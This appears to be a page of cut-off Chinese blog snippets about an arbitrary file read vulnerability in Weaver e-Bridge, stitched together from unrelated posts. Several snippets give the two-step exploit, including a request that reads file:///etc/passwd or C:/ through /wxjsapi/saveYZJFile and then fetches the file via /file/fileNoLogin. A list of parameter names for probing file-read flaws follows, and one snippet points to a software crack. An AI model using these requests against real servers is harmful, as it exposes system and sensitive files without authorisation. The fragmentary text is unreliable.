上一篇文章：泛微云桥任意文件读取漏洞 利用方式： 第一步： /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt　　 第二步： /file/fileNoLogin/id ...

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！ 主要成因 构造如下语句 获取id值如下 通过id值获取文件内容 ...

有时候不看官方文档进行配置，可能会出现奇奇怪怪的问题，SO转载一下官方文档，顺带学习。 想超长体验此软件，请搜索本博客内容，有破解方法，仅用来学习使用，顺带进行二次开发，请勿使用在商业用途，谢谢。 泛微云桥e-Bridge安装手册 一、 概述 泛微云桥（e-Bridge）是上海泛微 ...

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1. ...

泛微OA云桥未授权任意文件读取 一、漏洞描述 泛微云桥（e-Bridge）是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。 二、漏洞影响版本 ...

目录 目录浏览(目录遍历)漏洞 任意文件读取/下载漏洞 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷，导致网站目录可以被任意浏览，这会导致网站很多隐私文件与目录泄露，比如数据库备份文件、配置文件等，攻击者利用该信息可以为进一步入侵网站做准备。 目录浏览漏洞的探测 ...

任意文件读取常见参数名： &RealPath= &FilePath= &file= &filename= &Path= &path= &inputFile= &url= &urls= &Lang= &dis ...

转自http://blog.csdn.net/cd_xuyue/article/details/50560259 敏感字段 &RealPa ...